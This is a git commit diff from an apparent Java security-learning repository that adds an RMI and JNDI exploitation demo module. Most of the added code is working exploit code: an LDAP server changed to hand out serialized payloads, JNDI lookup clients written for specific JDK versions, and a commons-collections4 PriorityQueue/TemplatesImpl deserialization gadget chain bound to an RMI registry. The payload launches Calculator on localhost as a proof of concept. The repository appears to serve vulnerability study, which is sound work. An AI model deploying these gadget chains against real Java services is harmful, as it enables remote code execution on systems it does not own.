feat:增加rmi相关利用demo

Author: threedr3am

README.md

@@ -29,4 +29,7 @@ paclage：com.threedr3am.bug.xxe
 package：com.threedr3am.bug.collections
 
 ###  security-anager
-package：com.threedr3am.bug.security.manager
+package：com.threedr3am.bug.security.manager
+
+### rmi
+package：com.threedr3am.bug.rmi

common/src/main/java/com/threedr3am/bug/common/server/LdapServer.java

@@ -9,9 +9,11 @@
 import com.unboundid.ldap.sdk.LDAPException;
 import com.unboundid.ldap.sdk.LDAPResult;
 import com.unboundid.ldap.sdk.ResultCode;
+import com.unboundid.util.Base64;
 import java.net.InetAddress;
 import java.net.MalformedURLException;
 import java.net.URL;
+import java.text.ParseException;
 import javax.net.ServerSocketFactory;
 import javax.net.SocketFactory;
 import javax.net.ssl.SSLSocketFactory;
@@ -24,6 +26,7 @@
 public class LdapServer {
 
   private static final String LDAP_BASE = "dc=example,dc=com";
+  public static byte[] classData;
 
   public static void main(String[] args) {
     run();
@@ -94,9 +97,15 @@ protected void sendResult(InMemoryInterceptedSearchResult result, String base, E
       if (refPos > 0) {
         cbstring = cbstring.substring(0, refPos);
       }
-      e.addAttribute("javaCodeBase", cbstring);
-      e.addAttribute("objectClass", "javaNamingReference"); //$NON-NLS-1$
-      e.addAttribute("javaFactory", this.codebase.getRef());
+      if (classData == null) {
+        //todo <= jdk8u191
+        e.addAttribute("javaCodeBase", cbstring);
+        e.addAttribute("objectClass", "javaNamingReference"); //$NON-NLS-1$
+        e.addAttribute("javaFactory", this.codebase.getRef());
+      } else {
+        //todo > jdk8u191
+        e.addAttribute("javaSerializedData", classData);
+      }
       result.sendSearchEntry(e);
       result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
     }

pom.xml

@@ -17,6 +17,7 @@
     <module>security-manager</module>
     <module>xxe</module>
     <module>dubbo</module>
+    <module>rmi</module>
   </modules>
 
   <name>learn-java-bug</name>

rmi/pom.xml

@@ -0,0 +1,35 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+  xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+  <parent>
+    <artifactId>learn-java-bug</artifactId>
+    <groupId>com.xyh</groupId>
+    <version>1.0-SNAPSHOT</version>
+  </parent>
+  <modelVersion>4.0.0</modelVersion>
+
+  <artifactId>rmi</artifactId>
+  <packaging>pom</packaging>
+
+  <dependencies>
+    <dependency>
+      <groupId>com.xyh</groupId>
+      <artifactId>common</artifactId>
+      <version>1.0-SNAPSHOT</version>
+    </dependency>
+
+    <dependency>
+      <groupId>org.apache.commons</groupId>
+      <artifactId>commons-collections4</artifactId>
+      <version>4.0</version>
+    </dependency>
+
+    <!-- https://mvnrepository.com/artifact/org.javassist/javassist -->
+    <dependency>
+      <groupId>org.javassist</groupId>
+      <artifactId>javassist</artifactId>
+      <version>3.25.0-GA</version>
+    </dependency>
+  </dependencies>
+</project>

rmi/src/main/java/com/threedr3am/bug/rmi/client/JndiLookupForGtJdk8u191.java

@@ -0,0 +1,66 @@
+package com.threedr3am.bug.rmi.client;
+
+import com.threedr3am.bug.common.server.LdapServer;
+import com.threedr3am.bug.common.utils.Reflections;
+import com.threedr3am.bug.rmi.utils.Gadgets;
+import java.io.ByteArrayOutputStream;
+import java.io.ObjectOutputStream;
+import java.util.PriorityQueue;
+import javax.naming.InitialContext;
+import javax.naming.NamingException;
+import org.apache.commons.collections4.comparators.TransformingComparator;
+import org.apache.commons.collections4.functors.InvokerTransformer;
+
+/**
+ * 在jdk8u121版本后，jdk加入了rmi远程代码信任机制，除非设置环境变量com.sun.jndi.rmi.object.trustURLCodebase为true，否则不会加载远程代码
+ *
+ * @author threedr3am
+ */
+public class JndiLookupForGtJdk8u191 {
+
+  static {
+    try {
+      LdapServer.classData = makePayload(new String[]{"/System/Applications/Calculator.app/Contents/MacOS/Calculator"});
+    } catch (Exception e) {
+      e.printStackTrace();
+    }
+    LdapServer.run();
+  }
+
+  public static void main(String[] args) {
+    try {
+      new InitialContext().lookup("ldap://127.0.0.1:43658/PriorityQueue");
+    } catch (NamingException e) {
+      e.printStackTrace();
+    } catch (Exception e) {
+      e.printStackTrace();
+    }
+  }
+
+  private static byte[] makePayload(String[] args) throws Exception {
+    final Object templates = Gadgets.createTemplatesImpl(args[0]);
+    // mock method name until armed
+    final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
+
+    // create queue with numbers and basic comparator
+    final PriorityQueue<Object> queue = new PriorityQueue<Object>(2,new TransformingComparator(transformer));
+    // stub data for replacement later
+    queue.add(1);
+    queue.add(1);
+
+    // switch method called by comparator
+    Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");
+
+    // switch contents of queue
+    final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
+    queueArray[0] = templates;
+    queueArray[1] = 1;
+
+    ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
+    ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
+    objectOutputStream.writeObject(queue);
+    objectOutputStream.close();
+    return byteArrayOutputStream.toByteArray();
+
+  }
+}

rmi/src/main/java/com/threedr3am/bug/rmi/client/JndiLookupForJdk8u121To191.java

@@ -0,0 +1,25 @@
+package com.threedr3am.bug.rmi.client;
+
+import com.threedr3am.bug.common.server.LdapServer;
+import javax.naming.InitialContext;
+import javax.naming.NamingException;
+
+/**
+ * @author threedr3am
+ */
+public class JndiLookupForJdk8u121To191 {
+
+  static {
+    LdapServer.run();
+  }
+
+  public static void main(String[] args) {
+    try {
+      new InitialContext().lookup("ldap://127.0.0.1:43658/Calc");
+    } catch (NamingException e) {
+      e.printStackTrace();
+    } catch (Exception e) {
+      e.printStackTrace();
+    }
+  }
+}

rmi/src/main/java/com/threedr3am/bug/rmi/client/JndiLookupForLeJdk8u121.java

@@ -0,0 +1,27 @@
+package com.threedr3am.bug.rmi.client;
+
+import com.threedr3am.bug.common.server.RmiServer;
+import javax.naming.InitialContext;
+import javax.naming.NamingException;
+
+/**
+ * 在jdk8u121版本后，jdk加入了rmi远程代码信任机制，除非设置环境变量com.sun.jndi.rmi.object.trustURLCodebase为true，否则不会加载远程代码
+ *
+ * @author threedr3am
+ */
+public class JndiLookupForLeJdk8u121 {
+
+  static {
+    RmiServer.run();
+  }
+
+  public static void main(String[] args) {
+    try {
+      new InitialContext().lookup("rmi://127.0.0.1:43657/Calc");
+    } catch (NamingException e) {
+      e.printStackTrace();
+    } catch (Exception e) {
+      e.printStackTrace();
+    }
+  }
+}

rmi/src/main/java/com/threedr3am/bug/rmi/client/RMIClient.java

@@ -0,0 +1,25 @@
+package com.threedr3am.bug.rmi.client;
+
+import com.threedr3am.bug.rmi.server.service.HelloService;
+import java.rmi.NotBoundException;
+import java.rmi.RemoteException;
+import java.rmi.registry.LocateRegistry;
+import java.rmi.registry.Registry;
+
+/**
+ * @author threedr3am
+ */
+public class RMIClient {
+
+  public static void main(String[] args) {
+    try {
+      Registry registry = LocateRegistry.getRegistry("127.0.0.1", 1099);
+      HelloService helloService = (HelloService) registry.lookup("hello");
+      System.out.println(helloService.sayHello());
+    } catch (RemoteException e) {
+      e.printStackTrace();
+    } catch (NotBoundException e) {
+      e.printStackTrace();
+    }
+  }
+}

rmi/src/main/java/com/threedr3am/bug/rmi/registry/AttackRMIRegistry.java

@@ -0,0 +1,55 @@
+package com.threedr3am.bug.rmi.registry;
+
+import com.threedr3am.bug.common.utils.Reflections;
+import com.threedr3am.bug.rmi.utils.Gadgets;
+import java.rmi.AlreadyBoundException;
+import java.rmi.Remote;
+import java.rmi.RemoteException;
+import java.rmi.registry.LocateRegistry;
+import java.rmi.registry.Registry;
+import java.util.PriorityQueue;
+import org.apache.commons.collections4.comparators.TransformingComparator;
+import org.apache.commons.collections4.functors.InvokerTransformer;
+
+/**
+ * RMI服务端攻击RMI Registry
+ *
+ * 需要服务端和注册中心都存在此依赖 org.apache.commons:commons-collections4:4.0
+ *
+ * @author threedr3am
+ */
+public class AttackRMIRegistry {
+
+  public static void main(String[] args) {
+    try {
+      Registry registry = LocateRegistry.getRegistry("127.0.0.1", 1099);
+      Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap("threedr3am", makePayload(new String[]{"/System/Applications/Calculator.app/Contents/MacOS/Calculator"})), Remote.class);
+      registry.bind("hello", remote);
+    } catch (AlreadyBoundException | RemoteException e) {
+      e.printStackTrace();
+    } catch (Exception e) {
+      e.printStackTrace();
+    }
+  }
+
+  private static Object makePayload(String[] args) throws Exception {
+    final Object templates = Gadgets.createTemplatesImpl(args[0]);
+    // mock method name until armed
+    final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
+
+    // create queue with numbers and basic comparator
+    final PriorityQueue<Object> queue = new PriorityQueue<Object>(2,new TransformingComparator(transformer));
+    // stub data for replacement later
+    queue.add(1);
+    queue.add(1);
+
+    // switch method called by comparator
+    Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");
+
+    // switch contents of queue
+    final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
+    queueArray[0] = templates;
+    queueArray[1] = 1;
+    return queue;
+  }
+}

rmi/src/main/java/com/threedr3am/bug/rmi/registry/RMIRegistry.java

@@ -0,0 +1,16 @@
+package com.threedr3am.bug.rmi.registry;
+
+import java.rmi.RemoteException;
+import java.rmi.registry.LocateRegistry;
+import java.rmi.registry.Registry;
+
+/**
+ * @author threedr3am
+ */
+public class RMIRegistry {
+
+  public static void main(String[] args) throws RemoteException {
+    Registry registry = LocateRegistry.createRegistry(1099);
+    while (true);
+  }
+}